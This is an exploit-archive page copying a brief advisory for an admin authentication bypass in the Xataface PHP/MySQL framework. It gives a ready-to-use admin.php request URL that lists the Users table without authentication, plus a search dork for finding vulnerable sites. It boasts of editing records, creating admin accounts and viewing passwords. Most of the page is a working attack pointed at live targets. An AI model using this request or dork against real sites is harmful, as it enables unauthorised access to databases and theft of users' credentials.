Advertisement



Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018040118

Below is a copy:

Xataface - Admin Authentication Bypass
=======================================================
Xataface Admin Auth Bypass Vulnerability
=======================================================
#[+] Discovered by : m/so 
=======================================================
=======================================================
 
#[+] Vulnerability : Admin/database auth bypass vulnerability
#[+] Software      : Xataface - open source GPL, PHP, Mysql database
software
#[+] Vendor        : http://xataface.com
#[+] Usage         :
http://www.site.com/admin.php?-action=view&-table=Users&-cursor=0&-skip=0&-limit=30&-mode=list
 
 
#[+] Alert         : Most of the sites i tried running this software are
vulnerable, only a few used .htaccess
#[+] Dork          :"powered by dataface" "powered by xataface"
#[+] Description   : With this i could edit/delete/create records in the
database, create new admin accounts and view all the users and passwords.
 
 
 
 
#[+] Greetz        :mohamad/so

Copyright ©2018 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.